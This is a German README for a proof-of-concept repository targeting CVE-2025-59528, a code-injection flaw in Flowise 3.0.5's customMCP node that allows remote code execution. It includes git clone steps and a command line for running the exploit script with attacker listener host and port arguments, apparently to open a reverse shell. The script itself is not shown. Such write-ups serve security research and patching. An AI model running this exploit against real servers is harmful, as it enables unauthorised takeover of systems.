
CVE-2025-59528 Proof of Concept
Dieses Repository enthält einen Proof of Concept, der CVE-2025-59528 in Flowise v3.0.5 demonstriert.
Die Schwachstelle existiert im customMCP-Knoten, wo die vom Benutzer bereitgestellte Eingabe mcpServerConfig auf eine Weise verarbeitet wird, die über unsichere Auswertung mit dem Function-Konstruktor zur Ausführung von JavaScript-Code führt.
| Betroffen | Behoben |
|---|---|
| 3.0.5 | 3.0.6 |
Ein authentifizierter Benutzer ist möglicherweise in der Lage, beliebiges JavaScript auf dem Server auszuführen, was potenziell zu Remote Code Execution führen kann.
git clone https://github.com/vanhari/CVE-2025-59528.git
cd CVE-2025-59528
git clone https://github.com/vanhari/CVE-2025-59528.git
cd CVE-2025-59528
python3 CVE-2025-59528.py -t "<url>" --api-key <api_key> --lhost <ip> --lport <port>

Dieses Tool dient nur zu Bildungs- und Forschungszwecken. Der Ersteller übernimmt keine Verantwortung für Missbrauch oder Schäden, die durch das Tool verursacht werden.